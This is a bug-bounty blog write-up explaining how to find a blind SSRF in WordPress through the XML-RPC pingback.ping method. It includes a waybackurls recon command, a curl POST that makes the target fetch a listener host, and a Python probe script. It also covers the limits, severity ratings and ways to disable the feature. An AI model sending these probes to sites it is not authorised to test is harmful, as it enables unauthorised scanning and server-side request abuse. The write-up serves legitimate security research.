$1350 Bounty From a Simple WordPress XML RPC SSRF Bug 😱👨💻 + Free SEVEN X Custom Nuclei Template Gift Inside 🆓
This is a simple but powerful write-up for new bug hunters. Today I will show how I found a very easy WordPress XML-RPC bug that gave me a total bounty of 1350 USD. 💰 Many websites still have this issue because developers forget to disable old features or do not understand how XML-RPC works. Bug hunters learn this in a day, but some developers leave the same mistake online for years. 😅🔥
And the best part: you do not need to test everything manually. "SEVEN X" is giving away a free custom Nuclei template in this blog, so you can scan any WordPress site with one command and find the same bug in seconds. No hard work, no stress. Just scan, confirm, report, and enjoy the bounty. 🤑💻
What is XML-RPC in WordPress? 🤔
XML-RPC is a built-in WordPress feature that lets other applications talk to the site over HTTP. It is mostly used by mobile apps, Jetpack, and blogging tools to publish or manage posts. The endpoint normally lives at https://pixellabgeeks.com/xmlrpc.php. Many websites keep it enabled even when nothing uses it, which exposes remote methods such as pingback.ping to anyone on the internet and creates a security risk if it is not protected. 📡🗃️
1️⃣ Finding XML RPC With Waybackurls 🔍
Finding the endpoint is very easy. I used a simple tool named waybackurls, which pulls the site's old paths from the Wayback Machine. Many WordPress sites have an xmlrpc.php file listed there.
- Command used:
$ waybackurls pixellabgeeks.com | grep "xmlrpc"
Result:
- https://pixellabgeeks.com/xmlrpc.php
- https://blog.pixellabgeeks.com/xmlrpc.php
.......
👉 This shows the XML-RPC path has been indexed for this site. waybackurls returns archived URLs, not live ones, so the next step confirms the file is still reachable. ✅
2️⃣ Checking the Endpoint in Browser 🌐
When I opened the URL in the browser, I saw this error:
XML-RPC server accepts POST requests only.
✅ This is important. The endpoint is live: it rejects GET, but it will process a POST request, so we can move on to testing. 🔍
3️⃣ Sending the Exploit Request 🚨
Now I sent a POST request to the XML-RPC file using the pingback.ping method. This method takes two URLs, a source URL and a target URL. WordPress fetches the source URL to check that it links back to the target, so whatever URL we pass as the source, the server will try to request. This is perfect for SSRF testing. One condition: the target must be a post on the same site with pingbacks enabled; if it is not, WordPress answers with fault 33 and never fetches anything.
- I used this curl command:
curl -i -s -X POST https://pixellabgeeks.com/xmlrpc.php \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://xyz.oastify.com</string></value></param><param><value><string>https://pixellabgeeks.com/</string></value></param></params></methodCall>'
- ⚠️ Use your Burp Collaborator link or your own listener instead of xyz.oastify.com, and put the URL of a real post from the target site as the second parameter. 🛜
✅ If an HTTP request hits your listener, the server made that request, and the SSRF is confirmed. A DNS lookup alone only shows the hostname was resolved, so wait for the HTTP hit before reporting. The request arrives with the site's WordPress User-Agent, which also carries your own IP address ("verifying pingback from <ip>"), so you can tell it apart from random scanner traffic. 🎯
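The same request and response handling in one script, as an added example that is not part of the original write-up or of WordPress: it builds the pingback.ping call exactly as the curl command above does, and it reads the reply by the fault codes WordPress's pingback_ping() returns, so you can tell a reply that means "the server fetched your URL" from one that means "rejected before any fetch". The endpoint, the post URL and the listener hostname are placeholders to replace; the sample replies are constructed (shaped like WordPress's real ones) so the script runs offline.

```python
"""Send a WordPress pingback.ping request and read what the reply says about the fetch.

Added example for this write-up; not code from the original post or from WordPress.
TARGET_SITE, TARGET_POST and LISTENER are placeholders: replace them with your own.
"""
import urllib.request
import xml.parsers.expat
import xmlrpc.client

TARGET_SITE = "https://pixellabgeeks.com/xmlrpc.php"    # endpoint found with waybackurls
TARGET_POST = "https://pixellabgeeks.com/hello-world/"  # hypothetical post with pingbacks enabled
LISTENER = "http://xyz.oastify.com"                      # your Collaborator / own listener


def build_pingback_payload(source_uri: str, target_uri: str) -> bytes:
    """Serialise pingback.ping(sourceURI, targetURI); the server fetches sourceURI."""
    return xmlrpc.client.dumps(
        (source_uri, target_uri), methodname="pingback.ping"
    ).encode("utf-8")


def decode_payload(payload: bytes):
    """Parse a methodCall back into (params, methodname) to check what we send."""
    return xmlrpc.client.loads(payload)


def classify_reply(body: bytes) -> str:
    """Map an xmlrpc.php reply to what it tells us about the server-side fetch.

    Fault codes are those of pingback_ping() in wp-includes/class-wp-xmlrpc-server.php:
      0 / 33  target URL rejected; the server never fetched sourceURI
      48      this source was already registered for the post; no new fetch
      16      fetch returned nothing (network error, or wp_safe_remote_get refused the URL)
      17      fetch happened, but the page had no link to the target (the normal result
              of an SSRF probe: the request was made)
    A plain-text body is what a GET returns ("XML-RPC server accepts POST requests only.").
    """
    try:
        xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return {
            0: "rejected-before-fetch",
            33: "rejected-before-fetch",
            48: "already-registered",
            16: "fetch-failed-or-blocked",
            17: "fetched",
        }.get(fault.faultCode, f"fault-{fault.faultCode}")
    except xml.parsers.expat.ExpatError:
        return "not-xmlrpc"
    return "registered"  # success text: "Pingback from ... registered. Keep the web talking! :-)"


def send_pingback(endpoint: str, source_uri: str, target_uri: str, timeout: int = 15) -> str:
    """Live probe (needs network): POST the payload and classify the reply.

    The HTTP hit on your listener, not the fault code, is the proof of SSRF.
    """
    req = urllib.request.Request(
        endpoint,
        data=build_pingback_payload(source_uri, target_uri),
        headers={"Content-Type": "text/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_reply(resp.read())


def _fault(code: int, msg: str) -> bytes:
    """Build a methodResponse fault the way WordPress would send it (constructed sample)."""
    return xmlrpc.client.dumps(xmlrpc.client.Fault(code, msg), methodresponse=True).encode("utf-8")


# Constructed sample replies so the classifier can be exercised offline.
SAMPLE_REPLIES = {
    "get": b"XML-RPC server accepts POST requests only.",
    "bad_target": _fault(33, "The specified target URL cannot be used as a target. "
                             "It either does not exist, or it is not a pingback-enabled resource."),
    "blocked": _fault(16, "The source URL does not exist."),
    "no_link": _fault(17, "The source URL does not contain a link to the target URL, "
                          "and so cannot be used as a source."),
    "ok": xmlrpc.client.dumps(("Pingback from x to y registered. Keep the web talking! :-)",),
                              methodresponse=True).encode("utf-8"),
}

if __name__ == "__main__":
    print(build_pingback_payload(LISTENER, TARGET_POST).decode())
    for name, body in SAMPLE_REPLIES.items():
        print(f"{name:>10}: {classify_reply(body)}")
    # Against a site you are authorised to test, run the live probe and watch the listener:
    # print(send_pingback(TARGET_SITE, LISTENER, TARGET_POST))
```

Fault 16 is ambiguous on purpose: it is what you get both when your listener was unreachable and when wp_safe_remote_get refused the URL (a private address, a non-standard port), so an internal target that returns 16 has not been fetched. Fault 17 with an HTTP hit on the listener is the combination to screenshot for the report.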
🆗 SSRF Confirmation 🎉💰
After sending the POST request, I got an instant callback from the server. This showed that the website made a request to my listener. This is clear proof that the XML RPC pingback.ping method can be used for SSRF.
👉 Many websites keep this method open even when they do not need it. Know the limits before you report it: WordPress fetches the source URL with wp_safe_remote_get, which refuses loopback, private (RFC 1918) and link-local addresses, allows only ports 80, 443 and 8080, follows no redirects, and never returns the fetched body to you. So this is a blind, outbound-only SSRF, which is why programs usually rate it low or informational unless you can show more impact. ⚠️
⚠️ WordPress Feature Putting Your Site at Risk 🚨
The XML-RPC feature in WordPress allows remote access for apps like 📱 mobile clients, 🔗 Jetpack, and ✍️ posting tools. Many websites keep it enabled even when they don't need it, which exposes remote methods to attackers. If your site does not use it, disable it with the xmlrpc_enabled filter, drop pingback.ping with the xmlrpc_methods filter, or block xmlrpc.php at the web server; Jetpack and the mobile apps rely on it, so check what your site uses first. 🚨 This is exactly how I found a simple SSRF bug, tested it easily, and earned a $1350 USD bounty. With the "SEVEN X Custom Nuclei Template", you can now scan sites for this bug quickly without manual testing. 🛠️💰
🎉 Final Words 🎁
This is a very simple yet powerful bug, and it is easy to find with tools like waybackurls and curl. Many old WordPress sites still have this issue. Most of the time this bug is marked P5 (informational) or low, and sometimes it is accepted as P4. The final severity always depends on the program's triage team: if you can show higher impact, they may rate it P2 or even P1. 🤑🤗
✅ In my case, one report was accepted as P2 and another as P4, and together they gave me a total of $1350 USD in bounty. 💰👨💻
👉 This is a great bug for beginners because it is easy to test and can still give a good bounty. 😉
🎁 FREE GIFT | CUSTOM NUCLEI TEMPLATE 🤩
You reached the end of this write-up, which means you are a true Bug Hunter. As a reward, here is a special gift for you. 🫡 You can now download the "SEVEN X Custom Nuclei Template for XML RPC SSRF". This template will help you find this bug in just one scan, no manual testing needed. 🤗
In bug bounty, always keep updating yourself and carry real patience. ⏳💰 Those who have patience are the ones who earn the bounty. 🤗👨💻
#CyberSecurity #EthicalHacking #BugBounty #CustomNucleiTemplate #WebSecurity #PLG #SEVENxOFFICIAL